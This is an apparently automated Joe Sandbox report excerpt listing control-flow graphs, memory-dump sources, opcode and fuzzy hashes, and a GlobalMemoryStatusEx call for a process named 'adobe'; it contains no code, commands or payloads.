                      • Instruction ID: dbcf1a1af796116d03141eab932ea543dcac53345bd91f15d47c04c280eaa645
                      • Opcode Fuzzy Hash: 071c3275bfbf1074e14e402f260099f1858904a97c48453d359a0a4c90ccbe3a
                      • Instruction Fuzzy Hash: 6452A030E1021A8FDF64DB68D5807AEB7B2FB95318F208826D405EB395DAB5DC81CB91

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1237 6d27cf8-6d27d16 1238 6d27d18-6d27d1b 1237->1238 1239 6d27d3e-6d27d41 1238->1239 1240 6d27d1d-6d27d39 1238->1240 1241 6d27d43-6d27d4d 1239->1241 1242 6d27d4e-6d27d51 1239->1242 1240->1239 1244 6d27d53-6d27d61 1242->1244 1245 6d27d68-6d27d6b 1242->1245 1252 6d27d63 1244->1252 1253 6d27d9e-6d27db4 1244->1253 1246 6d27d8c-6d27d8e 1245->1246 1247 6d27d6d-6d27d87 1245->1247 1249 6d27d90 1246->1249 1250 6d27d95-6d27d98 1246->1250 1247->1246 1249->1250 1250->1238 1250->1253 1252->1245 1257 6d27dba-6d27dc3 1253->1257 1258 6d27fcf-6d27fd9 1253->1258 1259 6d27fda-6d2800f 1257->1259 1260 6d27dc9-6d27de6 1257->1260 1263 6d28011-6d28014 1259->1263 1267 6d27fbc-6d27fc9 1260->1267 1268 6d27dec-6d27e14 1260->1268 1265 6d280c1-6d280c4 1263->1265 1266 6d2801a-6d28026 1263->1266 1269 6d280c6-6d280e2 1265->1269 1270 6d280e7-6d280ea 1265->1270 1273 6d28031-6d28033 1266->1273 1267->1257 1267->1258 1268->1267 1293 6d27e1a-6d27e23 1268->1293 1269->1270 1271 6d280f0-6d280ff 1270->1271 1272 6d2831f-6d28321 1270->1272 1288 6d28101-6d2811c 1271->1288 1289 6d2811e-6d28162 1271->1289 1275 6d28323 1272->1275 1276 6d28328-6d2832b 1272->1276 1278 6d28035-6d2803b 1273->1278 1279 6d2804b-6d2804f 1273->1279 1275->1276 1276->1263 1282 6d28331-6d2833a 1276->1282 1284 6d2803f-6d28041 1278->1284 1285 6d2803d 1278->1285 1280 6d28051-6d2805b 1279->1280 1281 6d2805d 1279->1281 1286 6d28062-6d28064 1280->1286 1281->1286 1284->1279 1285->1279 1291 6d28066-6d28069 1286->1291 1292 6d2807b-6d280b4 1286->1292 1288->1289 1297 6d282f3-6d28309 1289->1297 1298 6d28168-6d28179 1289->1298 1291->1282 1292->1271 1317 6d280b6-6d280c0 1292->1317 1293->1259 1295 6d27e29-6d27e45 1293->1295 1305 6d27faa-6d27fb6 1295->1305 1306 6d27e4b-6d27e75 1295->1306 1297->1272 1307 6d282de-6d282ed 1298->1307 1308 6d2817f-6d2819c 1298->1308 1305->1267 1305->1293 1320 6d27fa0-6d27fa5 1306->1320 1321 6d27e7b-6d27ea3 1306->1321 1307->1297 1307->1298 1308->1307 1319 6d281a2-6d28298 call 6d26510 1308->1319 1370 6d282a6 1319->1370 1371 6d2829a-6d282a4 1319->1371 1320->1305 1321->1320 1327 6d27ea9-6d27ed7 1321->1327 1327->1320 1333 6d27edd-6d27ee6 1327->1333 1333->1320 1334 6d27eec-6d27f1e 1333->1334 1342 6d27f20-6d27f24 1334->1342 1343 6d27f29-6d27f45 1334->1343 1342->1320 1344 6d27f26 1342->1344 1343->1305 1345 6d27f47-6d27f9e call 6d26510 1343->1345 1344->1343 1345->1305 1372 6d282ab-6d282ad 1370->1372 1371->1372 1372->1307 1373 6d282af-6d282b4 1372->1373 1374 6d282c2 1373->1374 1375 6d282b6-6d282c0 1373->1375 1376 6d282c7-6d282c9 1374->1376 1375->1376 1376->1307 1377 6d282cb-6d282d7 1376->1377 1377->1307
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.1978087482.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_6d20000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID: $kq$$kq
                      • API String ID: 0-3550614674
                      • Opcode ID: 8544c32292028a31f1188f408b94aa12364941ae2acb1837e029adba1fca72a9
                      • Instruction ID: 61027b6e962f052e73649403e07f52303e077d22989edcb5dfe6e39ab50cfaa4
                      • Opcode Fuzzy Hash: 8544c32292028a31f1188f408b94aa12364941ae2acb1837e029adba1fca72a9
                      • Instruction Fuzzy Hash: 3402AE30B002169FCB64DB69D5946AEB7F2FF94314F148469D406DB398EB35EC86CB90
                      Memory Dump Source
                      • Source File: 00000003.00000002.1978087482.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_6d20000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c2977e8b1b9a51d23de0109d4c4194279581db989ad4f2f77ae51bb0ebb79159
                      • Instruction ID: 1bead983f484d85765956ce32f3527327509c99b778ee821f2081c10c2b79c88
                      • Opcode Fuzzy Hash: c2977e8b1b9a51d23de0109d4c4194279581db989ad4f2f77ae51bb0ebb79159
                      • Instruction Fuzzy Hash: 77628D30B002668FDB54DB68D594AADB7F2FF98318F248469E406DB394DB35EC46CB90
                      Memory Dump Source
                      • Source File: 00000003.00000002.1978087482.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_6d20000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: fb1a4b9c1359d80e37eb141fe7baebf296d8847f98ef58dfe5eded0806c13bf3
                      • Instruction ID: 0584126d42cb2e261f2efbde042124edfae2a25e0f98f9f9832f02ca1d545d1d
                      • Opcode Fuzzy Hash: fb1a4b9c1359d80e37eb141fe7baebf296d8847f98ef58dfe5eded0806c13bf3
                      • Instruction Fuzzy Hash: 78328230B2021A8FDF94DB68D994BAEB7B2FB98314F508529D405E7355DB35EC82CB90
                      Memory Dump Source
                      • Source File: 00000003.00000002.1978087482.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_6d20000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2537694e30994812526ed8411933db7da377bf4564e70022c2536d13b3015b63
                      • Instruction ID: 087d1a0f584f26f4aca4cf5d69345d67172366492b50907a3cca7882e4b7599a
                      • Opcode Fuzzy Hash: 2537694e30994812526ed8411933db7da377bf4564e70022c2536d13b3015b63
                      • Instruction Fuzzy Hash: FF12E371F102269FDF60DB68E980B6EB7B2EF94314F248469D816DB395DA34EC41CB90

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 0 6d2ac40-6d2ac5e 1 6d2ac60-6d2ac63 0->1 2 6d2ac73-6d2ac76 1->2 3 6d2ac65-6d2ac6e 1->3 4 6d2ac78-6d2ac94 2->4 5 6d2ac99-6d2ac9c 2->5 3->2 4->5 6 6d2acb6-6d2acb9 5->6 7 6d2ac9e-6d2acb1 5->7 9 6d2acbb-6d2acc8 6->9 10 6d2accd-6d2acd0 6->10 7->6 9->10 12 6d2acd2-6d2acd7 10->12 13 6d2acda-6d2acdd 10->13 12->13 14 6d2acf7-6d2acfa 13->14 15 6d2acdf-6d2ace8 13->15 20 6d2ad00-6d2ad03 14->20 21 6d2ae5d-6d2ae66 14->21 18 6d2ae77-6d2aeae 15->18 19 6d2acee-6d2acf2 15->19 29 6d2aeb0-6d2aeb3 18->29 19->14 22 6d2ad14-6d2ad16 20->22 23 6d2ad05-6d2ad09 20->23 21->15 24 6d2ae6c-6d2ae76 21->24 27 6d2ad18 22->27 28 6d2ad1d-6d2ad20 22->28 23->24 26 6d2ad0f 23->26 26->22 27->28 28->1 30 6d2ad26-6d2ad4a 28->30 31 6d2aec0-6d2aec3 29->31 32 6d2aeb5-6d2aeb9 29->32 48 6d2ad50-6d2ad5f 30->48 49 6d2ae5a 30->49 35 6d2aee6-6d2aee9 31->35 36 6d2aec5-6d2aee1 31->36 33 6d2aebb 32->33 34 6d2aeef-6d2af2a 32->34 33->31 46 6d2af30-6d2af3c 34->46 47 6d2b11d-6d2b130 34->47 35->34 38 6d2b152-6d2b155 35->38 36->35 39 6d2b162-6d2b165 38->39 40 6d2b157-6d2b161 38->40 44 6d2b167 39->44 45 6d2b174-6d2b176 39->45 124 6d2b167 call 6d2b198 44->124 125 6d2b167 call 6d2b1a8 44->125 51 6d2b178 45->51 52 6d2b17d-6d2b180 45->52 58 6d2af3e-6d2af57 46->58 59 6d2af5c-6d2afa0 46->59 53 6d2b132 47->53 60 6d2ad61-6d2ad67 48->60 61 6d2ad77-6d2adb2 call 6d26510 48->61 49->21 51->52 52->29 56 6d2b186-6d2b190 52->56 62 6d2b133 53->62 55 6d2b16d-6d2b16f 55->45 58->53 78 6d2afa2-6d2afb4 59->78 79 6d2afbc-6d2affb 59->79 63 6d2ad6b-6d2ad6d 60->63 64 6d2ad69 60->64 76 6d2adb4-6d2adba 61->76 77 6d2adca-6d2ade1 61->77 62->62 63->61 64->61 80 6d2adbe-6d2adc0 76->80 81 6d2adbc 76->81 91 6d2ade3-6d2ade9 77->91 92 6d2adf9-6d2ae0a 77->92 78->79 85 6d2b0e2-6d2b0f7 79->85 86 6d2b001-6d2b0dc call 6d26510 79->86 80->77 81->77 85->47 86->85 94 6d2adeb 91->94 95 6d2aded-6d2adef 91->95 98 6d2ae22-6d2ae53 92->98 99 6d2ae0c-6d2ae12 92->99 94->92 95->92 98->49 100 6d2ae16-6d2ae18 99->100 101 6d2ae14 99->101 100->98 101->98 124->55 125->55
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.1978087482.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_6d20000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID: $kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq
                      • API String ID: 0-1078448309
                      • Opcode ID: 76d48437d35923909dae58e58ca92df8115d1465218a2397ec485a16a4e75f25
                      • Instruction ID: 79d0eb1011659b7a5a6609e31ab7af131956b551df481964ababb0989a718f12
                      • Opcode Fuzzy Hash: 76d48437d35923909dae58e58ca92df8115d1465218a2397ec485a16a4e75f25
                      • Instruction Fuzzy Hash: 70E18E30F1021A8FDB69DBA9D5806AEB7B2FF94304F24852AD405DB354DB75DC86CB90

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 862 6d290c8-6d290ed 863 6d290ef-6d290f2 862->863 864 6d299b0-6d299b3 863->864 865 6d290f8-6d2910d 863->865 866 6d299b5-6d299d4 864->866 867 6d299d9-6d299db 864->867 872 6d29125-6d2913b 865->872 873 6d2910f-6d29115 865->873 866->867 869 6d299e2-6d299e5 867->869 870 6d299dd 867->870 869->863 874 6d299eb-6d299f5 869->874 870->869 879 6d29146-6d29148 872->879 875 6d29117 873->875 876 6d29119-6d2911b 873->876 875->872 876->872 880 6d29160-6d291d1 879->880 881 6d2914a-6d29150 879->881 892 6d291d3-6d291f6 880->892 893 6d291fd-6d29219 880->893 882 6d29152 881->882 883 6d29154-6d29156 881->883 882->880 883->880 892->893 898 6d29245-6d29260 893->898 899 6d2921b-6d2923e 893->899 904 6d29262-6d29284 898->904 905 6d2928b-6d292a6 898->905 899->898 904->905 910 6d292cb-6d292d9 905->910 911 6d292a8-6d292c4 905->911 912 6d292db-6d292e4 910->912 913 6d292e9-6d29363 910->913 911->910 912->874 919 6d293b0-6d293c5 913->919 920 6d29365-6d29383 913->920 919->864 924 6d29385-6d29394 920->924 925 6d2939f-6d293ae 920->925 924->925 925->919 925->920
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.1978087482.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_6d20000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID: $kq$$kq$$kq$$kq
                      • API String ID: 0-2881790790
                      • Opcode ID: 269283b4f3f026927c65f5c4f1db6b237ac0feb5d12c7aa604c25cbf45513066
                      • Instruction ID: 761c3682142372bcaf250aa867659ca5b7402f6a83db5c84132ccb54384ceb6b
                      • Opcode Fuzzy Hash: 269283b4f3f026927c65f5c4f1db6b237ac0feb5d12c7aa604c25cbf45513066
                      • Instruction Fuzzy Hash: 77914030F1021A8FDB64DF6AD96076EB3F6FB84254F508469D409AB398EB74DC45CB90

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 928 6d2cec8-6d2cee3 929 6d2cee5-6d2cee8 928->929 930 6d2cef2-6d2cef5 929->930 931 6d2ceea-6d2ceef 929->931 932 6d2cef7-6d2cf39 930->932 933 6d2cf3e-6d2cf41 930->933 931->930 932->933 934 6d2cf43-6d2cf85 933->934 935 6d2cf8a-6d2cf8d 933->935 934->935 937 6d2cfd6-6d2cfd9 935->937 938 6d2cf8f-6d2cfd1 935->938 940 6d2cfdb-6d2cfdd 937->940 941 6d2cfe8-6d2cfeb 937->941 938->937 944 6d2cfe3 940->944 945 6d2d26f-6d2d278 940->945 946 6d2d034-6d2d037 941->946 947 6d2cfed-6d2d02f 941->947 944->941 951 6d2d287-6d2d293 945->951 952 6d2d27a-6d2d27f 945->952 949 6d2d080-6d2d083 946->949 950 6d2d039-6d2d07b 946->950 947->946 954 6d2d085-6d2d0c7 949->954 955 6d2d0cc-6d2d0cf 949->955 950->949 957 6d2d3a4-6d2d3a9 951->957 958 6d2d299-6d2d2ad 951->958 952->951 954->955 960 6d2d0d1-6d2d113 955->960 961 6d2d118-6d2d11b 955->961 973 6d2d3b1 957->973 972 6d2d2b3-6d2d2c5 958->972 958->973 960->961 969 6d2d121-6d2d124 961->969 970 6d2d3b4-6d2d3c0 961->970 979 6d2d126-6d2d142 969->979 980 6d2d147-6d2d14a 969->980 975 6d2d3c6-6d2d6b3 970->975 976 6d2d14c-6d2d15b 970->976 1003 6d2d2c7-6d2d2cd 972->1003 1004 6d2d2e9-6d2d2eb 972->1004 973->970 1140 6d2d8da-6d2d8e4 975->1140 1141 6d2d6b9-6d2d6bf 975->1141 982 6d2d16a-6d2d176 976->982 983 6d2d15d-6d2d162 976->983 979->980 980->976 981 6d2d193-6d2d196 980->981 991 6d2d1a5-6d2d1a8 981->991 992 6d2d198-6d2d19a 981->992 989 6d2d8e5-6d2d91e 982->989 990 6d2d17c-6d2d18e 982->990 983->982 1019 6d2d920-6d2d923 989->1019 990->981 1001 6d2d1f1-6d2d1f4 991->1001 1002 6d2d1aa-6d2d1ec 991->1002 992->973 1000 6d2d1a0 992->1000 1000->991 1015 6d2d211-6d2d214 1001->1015 1016 6d2d1f6-6d2d20c 1001->1016 1002->1001 1011 6d2d2d1-6d2d2dd 1003->1011 1012 6d2d2cf 1003->1012 1009 6d2d2f5-6d2d301 1004->1009 1042 6d2d303-6d2d30d 1009->1042 1043 6d2d30f 1009->1043 1022 6d2d2df-6d2d2e7 1011->1022 1012->1022 1017 6d2d216-6d2d225 1015->1017 1018 6d2d25d-6d2d25f 1015->1018 1016->1015 1025 6d2d227-6d2d22c 1017->1025 1026 6d2d234-6d2d240 1017->1026 1030 6d2d261 1018->1030 1031 6d2d266-6d2d269 1018->1031 1028 6d2d946-6d2d949 1019->1028 1029 6d2d925-6d2d941 1019->1029 1022->1009 1025->1026 1026->989 1036 6d2d246-6d2d258 1026->1036 1037 6d2d94b-6d2d977 1028->1037 1038 6d2d97c-6d2d97f 1028->1038 1029->1028 1030->1031 1031->929 1031->945 1036->1018 1037->1038 1045 6d2d981 1038->1045 1046 6d2d98e-6d2d990 1038->1046 1047 6d2d314-6d2d316 1042->1047 1043->1047 1187 6d2d981 call 6d2da50 1045->1187 1188 6d2d981 call 6d2da47 1045->1188 1052 6d2d992 1046->1052 1053 6d2d997-6d2d99a 1046->1053 1047->973 1055 6d2d31c-6d2d338 call 6d26510 1047->1055 1052->1053 1053->1019 1059 6d2d99c-6d2d9ab 1053->1059 1069 6d2d347-6d2d353 1055->1069 1070 6d2d33a-6d2d33f 1055->1070 1058 6d2d987-6d2d989 1058->1046 1066 6d2da12-6d2da27 1059->1066 1067 6d2d9ad-6d2da10 call 6d26510 1059->1067 1067->1066 1069->957 1073 6d2d355-6d2d3a2 1069->1073 1070->1069 1073->973 1142 6d2d6c1-6d2d6c6 1141->1142 1143 6d2d6ce-6d2d6d7 1141->1143 1142->1143 1143->989 1144 6d2d6dd-6d2d6f0 1143->1144 1146 6d2d6f6-6d2d6fc 1144->1146 1147 6d2d8ca-6d2d8d4 1144->1147 1148 6d2d70b-6d2d714 1146->1148 1149 6d2d6fe-6d2d703 1146->1149 1147->1140 1147->1141 1148->989 1150 6d2d71a-6d2d73b 1148->1150 1149->1148 1153 6d2d74a-6d2d753 1150->1153 1154 6d2d73d-6d2d742 1150->1154 1153->989 1155 6d2d759-6d2d776 1153->1155 1154->1153 1155->1147 1158 6d2d77c-6d2d782 1155->1158 1158->989 1159 6d2d788-6d2d7a1 1158->1159 1161 6d2d7a7-6d2d7ce 1159->1161 1162 6d2d8bd-6d2d8c4 1159->1162 1161->989 1165 6d2d7d4-6d2d7de 1161->1165 1162->1147 1162->1158 1165->989 1166 6d2d7e4-6d2d7fb 1165->1166 1168 6d2d80a-6d2d825 1166->1168 1169 6d2d7fd-6d2d808 1166->1169 1168->1162 1174 6d2d82b-6d2d844 call 6d26510 1168->1174 1169->1168 1178 6d2d853-6d2d85c 1174->1178 1179 6d2d846-6d2d84b 1174->1179 1178->989 1180 6d2d862-6d2d8b6 1178->1180 1179->1178 1180->1162 1187->1058 1188->1058
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.1978087482.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_6d20000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID: $kq$$kq$$kq
                      • API String ID: 0-2086306503
                      • Opcode ID: b3adbb2a91b8a86c0e6b84b73e6fc52b1f46c4263012976752a3648e4226cd99
                      • Instruction ID: 7a9e23657bcdeacbc2bb06cb68baaad3b55a2b90075b3b0c962821e1c9402ff2
                      • Opcode Fuzzy Hash: b3adbb2a91b8a86c0e6b84b73e6fc52b1f46c4263012976752a3648e4226cd99
                      • Instruction Fuzzy Hash: 92622E30B002168FCB55DF68E694A5EB7F2FF84354B208A68D4059F369DB75ED86CB80

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1189 6d24b18-6d24b3c 1191 6d24b3e-6d24b41 1189->1191 1192 6d25220-6d25223 1191->1192 1193 6d24b47-6d24c3f 1191->1193 1194 6d25244-6d25246 1192->1194 1195 6d25225-6d2523f 1192->1195 1213 6d24cc2-6d24cc9 1193->1213 1214 6d24c45-6d24c8d 1193->1214 1197 6d25248 1194->1197 1198 6d2524d-6d25250 1194->1198 1195->1194 1197->1198 1198->1191 1200 6d25256-6d25263 1198->1200 1215 6d24ccf-6d24d3f 1213->1215 1216 6d24d4d-6d24d56 1213->1216 1235 6d24c92 call 6d253d0 1214->1235 1236 6d24c92 call 6d253c0 1214->1236 1233 6d24d41 1215->1233 1234 6d24d4a 1215->1234 1216->1200 1227 6d24c98-6d24cb4 1230 6d24cb6 1227->1230 1231 6d24cbf 1227->1231 1230->1231 1231->1213 1233->1234 1234->1216 1235->1227 1236->1227
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.1978087482.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_6d20000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID: fpq$XPpq$\Opq
                      • API String ID: 0-2571271785
                      • Opcode ID: a6b7c506773a7cc79e71492556baf1627e32d3199e46b70b86dcd3ebeebff488
                      • Instruction ID: 2efe148194c68ac2a62a8e492541cb02c0acc28a06ba3812e93297d59d72a578
                      • Opcode Fuzzy Hash: a6b7c506773a7cc79e71492556baf1627e32d3199e46b70b86dcd3ebeebff488
                      • Instruction Fuzzy Hash: EC616470F0021A9FEB54DBA9D4547AEBAF6FF98300F208429D506AB395DF758C458F90

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1940 6d290b9-6d290ed 1942 6d290ef-6d290f2 1940->1942 1943 6d299b0-6d299b3 1942->1943 1944 6d290f8-6d2910d 1942->1944 1945 6d299b5-6d299d4 1943->1945 1946 6d299d9-6d299db 1943->1946 1951 6d29125-6d2913b 1944->1951 1952 6d2910f-6d29115 1944->1952 1945->1946 1948 6d299e2-6d299e5 1946->1948 1949 6d299dd 1946->1949 1948->1942 1953 6d299eb-6d299f5 1948->1953 1949->1948 1958 6d29146-6d29148 1951->1958 1954 6d29117 1952->1954 1955 6d29119-6d2911b 1952->1955 1954->1951 1955->1951 1959 6d29160-6d291d1 1958->1959 1960 6d2914a-6d29150 1958->1960 1971 6d291d3-6d291f6 1959->1971 1972 6d291fd-6d29219 1959->1972 1961 6d29152 1960->1961 1962 6d29154-6d29156 1960->1962 1961->1959 1962->1959 1971->1972 1977 6d29245-6d29260 1972->1977 1978 6d2921b-6d2923e 1972->1978 1983 6d29262-6d29284 1977->1983 1984 6d2928b-6d292a6 1977->1984 1978->1977 1983->1984 1989 6d292cb-6d292d9 1984->1989 1990 6d292a8-6d292c4 1984->1990 1991 6d292db-6d292e4 1989->1991 1992 6d292e9-6d29363 1989->1992 1990->1989 1991->1953 1998 6d293b0-6d293c5 1992->1998 1999 6d29365-6d29383 1992->1999 1998->1943 2003 6d29385-6d29394 1999->2003 2004 6d2939f-6d293ae 1999->2004 2003->2004 2004->1998 2004->1999
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.1978087482.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_6d20000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID: $kq$$kq
                      • API String ID: 0-3550614674
                      • Opcode ID: a4738347624e1e071bfeb6fc06cdc232305c5edeebe2a97189deb6d21686ba93
                      • Instruction ID: 8e0d4258a3e9fa13976fa9c91efab4496e03097849a574c10c1c2a5ca94368bc
                      • Opcode Fuzzy Hash: a4738347624e1e071bfeb6fc06cdc232305c5edeebe2a97189deb6d21686ba93
                      • Instruction Fuzzy Hash: EC515F30B102168FDB54DF7AD9A476EB3F6EB88650F508469D40ADB398EA74EC41CB90

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 2007 194eddb-194edec 2008 194edee-194edf9 2007->2008 2009 194ed79-194ed8b 2007->2009 2010 194edff-194ee8c GlobalMemoryStatusEx 2008->2010 2011 194edfb-194edfe 2008->2011 2025 194ed8d call 194ee18 2009->2025 2026 194ed8d call 194eddb 2009->2026 2018 194ee95-194eebd 2010->2018 2019 194ee8e-194ee94 2010->2019 2012 194ed92-194ed94 2013 194ed96-194ed99 2012->2013 2014 194ed9a-194edd2 2012->2014 2019->2018 2025->2012 2026->2012
                      APIs
                      • GlobalMemoryStatusEx.KERNELBASE ref: 0194EE7F
                      Memory Dump Source
                      • Source File: 00000003.00000002.1972251462.0000000001940000.00000040.00000800.00020000.00000000.sdmp, Offset: 01940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_1940000_adobe.jbxd
                      Similarity
                      • API ID: GlobalMemoryStatus
                      • String ID:
                      • API String ID: 1890195054-0
                      • Opcode ID: 741c717472811674faa6cc8c96bf3ea72edaed7bfd925307ad2bc786a986435d
                      • Instruction ID: b00ac5ce20c6ec01d54a057ca51cb1de9ab2858aa50f85c079df938c95d00dfd
                      • Opcode Fuzzy Hash: 741c717472811674faa6cc8c96bf3ea72edaed7bfd925307ad2bc786a986435d
                      • Instruction Fuzzy Hash: 1231ABB2D002598FDB10DFA9D8447DEBBB4BF48220F14812AD958A7341E3389985CBE1

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 2027 194ee18-194ee8c GlobalMemoryStatusEx 2029 194ee95-194eebd 2027->2029 2030 194ee8e-194ee94 2027->2030 2030->2029
                      APIs
                      • GlobalMemoryStatusEx.KERNELBASE ref: 0194EE7F
                      Memory Dump Source
                      • Source File: 00000003.00000002.1972251462.0000000001940000.00000040.00000800.00020000.00000000.sdmp, Offset: 01940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_1940000_adobe.jbxd
                      Similarity
                      • API ID: GlobalMemoryStatus
                      • String ID:
                      • API String ID: 1890195054-0
                      • Opcode ID: e3175ce5f97424d8048495edfcf8b0f71af48ef0593db0088126a03b16af126e
                      • Instruction ID: b91575375019f67e204c88761b38451e11eeaffdc3e3545148cff7a28ce8b3af
                      • Opcode Fuzzy Hash: e3175ce5f97424d8048495edfcf8b0f71af48ef0593db0088126a03b16af126e
                      • Instruction Fuzzy Hash: 1311EFB1C006699BCB10DF9AC544BDEFBF4BB48324F15816AD918A7250D378A944CFA5

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 2033 6d24b09-6d24b10 2034 6d24b12-6d24b31 2033->2034 2035 6d24b33-6d24b3c 2033->2035 2034->2035 2036 6d24b3e-6d24b41 2035->2036 2038 6d25220-6d25223 2036->2038 2039 6d24b47-6d24c3f 2036->2039 2040 6d25244-6d25246 2038->2040 2041 6d25225-6d2523f 2038->2041 2059 6d24cc2-6d24cc9 2039->2059 2060 6d24c45-6d24c8d 2039->2060 2043 6d25248 2040->2043 2044 6d2524d-6d25250 2040->2044 2041->2040 2043->2044 2044->2036 2046 6d25256-6d25263 2044->2046 2061 6d24ccf-6d24d3f 2059->2061 2062 6d24d4d-6d24d56 2059->2062 2081 6d24c92 call 6d253d0 2060->2081 2082 6d24c92 call 6d253c0 2060->2082 2079 6d24d41 2061->2079 2080 6d24d4a 2061->2080 2062->2046 2073 6d24c98-6d24cb4 2076 6d24cb6 2073->2076 2077 6d24cbf 2073->2077 2076->2077 2077->2059 2079->2080 2080->2062 2081->2073 2082->2073
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.1978087482.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_6d20000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID: XPpq
                      • API String ID: 0-1266478781
                      • Opcode ID: 025ccdb98cb787b5f6c5f17d8edc146b30ef5c60f857ea42061b59e0f5877978
                      • Instruction ID: cdb3d48c6069e18ee68c0f66910693ba58fa18f5aa1824495b123fa9a4be2526
                      • Opcode Fuzzy Hash: 025ccdb98cb787b5f6c5f17d8edc146b30ef5c60f857ea42061b59e0f5877978
                      • Instruction Fuzzy Hash: DD416170F102199FDB55DFA9C814BAEBAF6FF88700F20852AD505AB3A5DE749C05CB90

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 2083 6d2da50-6d2da67 2084 6d2da69-6d2da6c 2083->2084 2085 6d2da6e-6d2da9a 2084->2085 2086 6d2da9f-6d2daa2 2084->2086 2085->2086 2087 6d2dab1-6d2dab4 2086->2087 2088 6d2daa4 2086->2088 2089 6d2dab6-6d2dad2 2087->2089 2090 6d2dad7-6d2dad9 2087->2090 2091 6d2daaa-6d2daac 2088->2091 2089->2090 2092 6d2dae0-6d2dae3 2090->2092 2093 6d2dadb 2090->2093 2091->2087 2092->2084 2095 6d2dae5-6d2daf4 2092->2095 2093->2092 2098 6d2dafa-6d2db33 2095->2098 2099 6d2dc79-6d2dca3 2095->2099 2106 6d2db81-6d2dba5 2098->2106 2107 6d2db35-6d2db3f 2098->2107 2102 6d2dca4 2099->2102 2102->2102 2113 6d2dba7 2106->2113 2114 6d2dbaf-6d2dc73 2106->2114 2111 6d2db41-6d2db47 2107->2111 2112 6d2db57-6d2db7f 2107->2112 2115 6d2db4b-6d2db4d 2111->2115 2116 6d2db49 2111->2116 2112->2106 2112->2107 2113->2114 2114->2098 2114->2099 2115->2112 2116->2112
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.1978087482.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_6d20000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID: PHkq
                      • API String ID: 0-902561536
                      • Opcode ID: a592e833b4b93d2db9e635e0208e890a88a71bd407ce5abd87542854b8b8294f
                      • Instruction ID: 40cac0d19edc3683b4ad71d319d46095b868c0896af33646916f15a2cbc0764a
                      • Opcode Fuzzy Hash: a592e833b4b93d2db9e635e0208e890a88a71bd407ce5abd87542854b8b8294f
                      • Instruction Fuzzy Hash: 9041AF30E0021ADFDB64DFA5C594A9EBBB6FF95344F208429E405EB344DB70D946CB80

                      Control-flow Graph

                      • Executed
                      • Not Executed
